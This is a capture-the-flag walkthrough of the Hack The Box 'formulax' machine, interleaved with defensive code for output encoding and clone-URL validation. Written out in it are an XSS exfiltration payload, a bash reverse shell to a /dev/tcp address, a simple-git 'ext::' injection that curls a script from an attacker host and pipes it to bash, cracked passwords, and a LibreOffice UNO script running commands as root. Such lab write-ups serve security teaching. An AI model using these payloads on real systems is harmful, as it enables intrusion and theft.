HTB: formulax Writeup


Machine Information

Attribute       Details
Name            formulax
OS              Linux
Difficulty      Hard
Points          N/A
Release Date    N/A
IP Address      10.10.14.80
Author          D3vnomi

Machine Rating

⭐⭐⭐⭐☆ (8.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐⭐☆
  • Real-world: ⭐⭐⭐⭐☆
  • CVE: ⭐⭐⭐☆☆
  • CTF-like: ⭐⭐⭐⭐☆

Summary

formulax is a Hard-difficulty Linux machine. The exploitation path involves initial enumeration and service discovery, gaining an initial foothold through the identified vulnerability, lateral movement or credential extraction for user access, and finally privilege escalation to root/administrator.

TL;DR: Enumeration → Foothold → User credentials → Privilege escalation → Root.


Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.10.14.80

Results:

80/tcp open http

Service Enumeration

Hostnames:

  • chatbot.htb (main application)
  • dev-git-auto-update.chatbot.htb (git auto-update service)

Technologies Identified:

  • Node.js (Socket.IO-based chatbot)
  • MongoDB (user database)
  • LibreNMS (network monitoring)
  • LibreOffice (office suite with UNO API)

Add both hostnames to /etc/hosts:

echo "10.10.14.80 chatbot.htb dev-git-auto-update.chatbot.htb" >> /etc/hosts

Initial Foothold

Step 1: XSS via Socket.IO to Subdomain Discovery

The chatbot application contains an XSS vulnerability in the chat interface. By injecting a malicious payload using Socket.IO, we can exfiltrate chat history and discover hidden subdomains.

XSS Payload:

<img SRC=x onerror='eval(atob("..."))' />

Decoded payload functionality:

  • Loads Socket.IO library
  • Connects to the chat server
  • Emits ‘client_message’ with ‘history’ request
  • Exfiltrates chat data via fetch to attacker’s server

This reveals the dev-git-auto-update.chatbot.htb subdomain.
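The root cause on the chatbot side is that stored messages reach the client's DOM as raw HTML. The following is an added example, not code from the FormulaX chatbot, showing the defensive counterpart: a Socket.IO server that HTML-encodes every field of the `history` reply before it leaves the server, and flags messages that contain markup so they can be logged. The in-memory `sampleStore`, the sender names and the `buildHistoryReply` helper are constructed for this example; the second message reuses the payload shape quoted above to show it becomes inert text.

```javascript
// Added example (not the box's chatbot code): output-encode chat history
// before it is emitted to Socket.IO clients, so stored markup renders as text.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Replace every HTML-significant character with its entity.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// True if the raw message contains something a browser would parse as a tag.
function looksLikeMarkup(text) {
  return /<\s*[a-z!\/]/i.test(String(text));
}

// Build the 'history' reply for one client. Messages stay raw in the store
// (the record of what was sent is preserved); every field is encoded on the
// way out, and a 'flagged' marker lets the server log suspicious input.
// The store is a hypothetical in-memory array standing in for MongoDB.
function buildHistoryReply(store) {
  return store.map((m) => ({
    from: escapeHtml(m.from),
    text: escapeHtml(m.text),
    flagged: looksLikeMarkup(m.text),
  }));
}

// Constructed sample store: one benign message and one carrying the same
// shape of payload the writeup describes (sender names are made up).
const sampleStore = [
  { from: 'alice', text: 'hello, what is the formula for water?' },
  { from: 'mallory', text: `<img SRC=x onerror='eval(atob("..."))' />` },
];

// How this slots into a Socket.IO server (io is the server instance):
// io.on('connection', (socket) => {
//   socket.on('client_message', (msg) => {
//     if (msg === 'history') socket.emit('history', buildHistoryReply(sampleStore));
//   });
// });

console.log(JSON.stringify(buildHistoryReply(sampleStore), null, 2));
```

Encoding on the way out (rather than stripping on the way in) keeps the stored record intact for investigation while guaranteeing the client never receives live markup; the `flagged` field is where a detection hook would go.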

Step 2: RCE via simple-git Vulnerability (SNYK-JS-SIMPLEGIT-3112221)

The git auto-update service is vulnerable to command injection through the simple-git package.

Exploitation Steps:

  1. Add dev-git-auto-update.chatbot.htb to /etc/hosts:

     echo "10.10.14.80 dev-git-auto-update.chatbot.htb" >> /etc/hosts

  2. Create rev.sh with a bash reverse shell:

     cat > rev.sh << 'EOF'
     bash -i >& /dev/tcp/10.10.14.80/4444 0>&1
     EOF

  3. Host the reverse shell:

     python3 -m http.server 8000

  4. Intercept the git update request and set destinationURL to:

     ext::sh -c curl% http://attacker:8000/rev.sh|bash >&2

This bypasses the simple-git validation and achieves RCE as www-data.
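The service handed a user-controlled destinationURL straight to simple-git, so a remote-helper string such as `ext::` reached git itself. The following is an added example, not the box's git-auto-update code, of the check a defender would put in front of that clone call: a strict scheme and host allowlist plus rejection of anything git could read as an option or a remote-helper name. The host allowlist and the `validateCloneUrl` helper are assumptions made for this example; the rejected inputs in the test include the exact destinationURL value quoted above.

```javascript
// Added example (not the box's service code): validate a user-supplied clone
// URL before it is passed to simple-git. Everything that is not a plain
// https URL to an allowlisted host is refused at the edge.

const ALLOWED_PROTOCOLS = new Set(['https:']);
// Hypothetical allowlist of hosts this service is willing to pull from.
const ALLOWED_HOSTS = new Set(['github.com', 'gitlab.com']);

// Returns { ok: true, url } for an acceptable clone URL, otherwise
// { ok: false, reason } with a short reason suitable for logging.
function validateCloneUrl(input) {
  if (typeof input !== 'string') return { ok: false, reason: 'not a string' };
  const raw = input.trim();
  if (raw.length === 0 || raw.length > 2048) return { ok: false, reason: 'bad length' };
  // git reads a leading "-" as an option (argument injection).
  if (raw.startsWith('-')) return { ok: false, reason: 'leading dash' };
  // "<helper>::<rest>" selects a remote helper such as ext; never accept it.
  if (/^[a-z0-9.+-]+::/i.test(raw)) return { ok: false, reason: 'remote helper syntax' };
  // Whitespace and control characters have no place in a clone URL.
  if (/[\s\x00-\x1f\x7f]/.test(raw)) return { ok: false, reason: 'whitespace or control char' };

  let parsed;
  try {
    parsed = new URL(raw); // WHATWG parser built into Node.js
  } catch {
    return { ok: false, reason: 'unparseable' };
  }
  if (!ALLOWED_PROTOCOLS.has(parsed.protocol)) {
    return { ok: false, reason: `scheme ${parsed.protocol} not allowed` };
  }
  if (!ALLOWED_HOSTS.has(parsed.hostname)) {
    return { ok: false, reason: `host ${parsed.hostname} not allowed` };
  }
  if (parsed.username || parsed.password) {
    return { ok: false, reason: 'credentials in URL' };
  }
  return { ok: true, url: parsed.href };
}

// Where the check sits relative to the clone (simpleGit is the simple-git
// import; destDir is the service's target directory):
//   const check = validateCloneUrl(req.body.destinationURL);
//   if (!check.ok) return res.status(400).json({ error: check.reason });
//   await simpleGit().clone(check.url, destDir);

// Constructed inputs: the value from the writeup and a benign URL.
const samples = [
  'ext::sh -c curl% http://attacker:8000/rev.sh|bash >&2',
  'https://github.com/example/repo.git',
];
for (const s of samples) console.log(s, '=>', JSON.stringify(validateCloneUrl(s)));
```

Input validation is the first layer; updating simple-git past the advisory's fixed release and keeping git's own `protocol.ext.allow` policy at `never` on the host are the second and third, so a single missed check does not become command execution.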

Step 3: MongoDB Credential Extraction

Access MongoDB locally and extract user credentials:

mongo
use testing
db.users.find()

Users Found:

Crack hash with hashcat:

hashcat -m 3200 hash.txt wordlist.txt
# Result: manchesterunited

SSH Access:

ssh frank_dorky@chatbot.htb
# Password: manchesterunited

User Compromise

Lateral Movement: frank_dorky → kai_relay

With frank_dorky access, enumerate LibreNMS configuration for database credentials:

cd /opt/librenms
./config_to_json.php | grep "kai_relay"

Credentials Found:

  • User: kai_relay
  • Password: mychemicalformulaX

SSH as kai_relay:

ssh kai_relay@chatbot.htb
# Password: mychemicalformulaX

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>


Privilege Escalation

Enumeration

sudo -l
# Output: User kai_relay may run /usr/bin/office.sh without password

The kai_relay user can run /usr/bin/office.sh with sudo, which starts LibreOffice with UNO API listening on localhost:2002.

Exploitation: LibreOffice UNO API Remote Command Execution

LibreOffice’s UNO API allows arbitrary command execution when the bridge is exposed. The office.sh script starts LibreOffice listening for UNO connections.

Exploitation Steps:

Terminal 1 - Start LibreOffice:

ssh kai_relay@chatbot.htb
sudo /usr/bin/office.sh
# This starts LibreOffice UNO API on localhost:2002

Terminal 2 - Execute exploit:

ssh kai_relay@chatbot.htb
# Create and run exploit.py
python3 exploit.py

exploit.py:

import uno
from com.sun.star.beans import PropertyValue

# Local UNO component context used to obtain the URL resolver
local = uno.getComponentContext()
resolver = local.ServiceManager.createInstanceWithContext(
    "com.sun.star.bridge.UnoUrlResolver", local)

# Connect to the LibreOffice instance started by office.sh on localhost:2002
context = resolver.resolve(
    "uno:socket,host=localhost,port=2002;urp;StarOffice.ComponentContext")

# SystemShellExecute runs a program inside the LibreOffice process
rc = context.ServiceManager.createInstanceWithContext(
    "com.sun.star.system.SystemShellExecute", context)

# Execute command as root (since office.sh runs with sudo)
rc.execute("/usr/bin/cat", "/root/root.txt", 1)

This leverages the python-uno bridge to connect to LibreOffice and execute arbitrary commands with root privileges.

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>


Attack Chain Summary

graph TD
A["Service Enumeration<br/>chatbot.htb"] -->|XSS Discovery| B["Subdomain Found<br/>dev-git-auto-update.chatbot.htb"]
B -->|Simple-Git RCE| C["RCE as www-data<br/>SNYK-JS-SIMPLEGIT-3112221"]
C -->|MongoDB Access| D["Extract Credentials<br/>frank_dorky:manchesterunited"]
D -->|SSH Login| E["User Access<br/>frank_dorky"]
E -->|Config Enumeration| F["Discover Credentials<br/>kai_relay:mychemicalformulaX"]
F -->|SSH Login| G["Lateral Movement<br/>kai_relay"]
G -->|Sudo office.sh| H["LibreOffice UNO API<br/>localhost:2002"]
H -->|python-uno RCE| I["Root Access<br/>Command Execution"]

Tools Used

Tool                     Purpose
nmap                     Network port and service scanning
Burp Suite               HTTP request interception and manipulation
Python                   Socket.IO XSS payload creation and python-uno exploitation
hashcat                  Bcrypt password hash cracking
mongo                    MongoDB database access and credential extraction
ssh                      Secure shell access for lateral movement
python3 -m http.server   Simple HTTP server for serving the reverse shell
python-uno               LibreOffice UNO bridge for command execution

Key Learnings

  • XSS to Subdomain Discovery: XSS vulnerabilities in client-side applications can be leveraged to discover hidden services and infrastructure through exfiltration attacks.
  • Known CVE Exploitation: Simple-git and similar package vulnerabilities (SNYK-JS-SIMPLEGIT-3112221) can lead to direct RCE if not patched. Always monitor and apply security updates.
  • Database Access: Unprotected MongoDB instances on localhost are critical — they often contain plaintext passwords or crackable hashes for lateral movement.
  • Configuration Enumeration: Application config files (especially in /opt directories) frequently contain hardcoded credentials for other services.
  • Privileged Service Misuse: Services running with sudo privileges (like office.sh) can be abused if they expose APIs (UNO) without proper authentication or isolation.
  • UNO API Security: LibreOffice’s UNO bridge should never be exposed on network interfaces without authentication — it allows arbitrary command execution.
  • Multi-stage Lateral Movement: This machine demonstrates the importance of methodically escalating privileges through discovered credentials rather than expecting a single vector to root.

Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Hard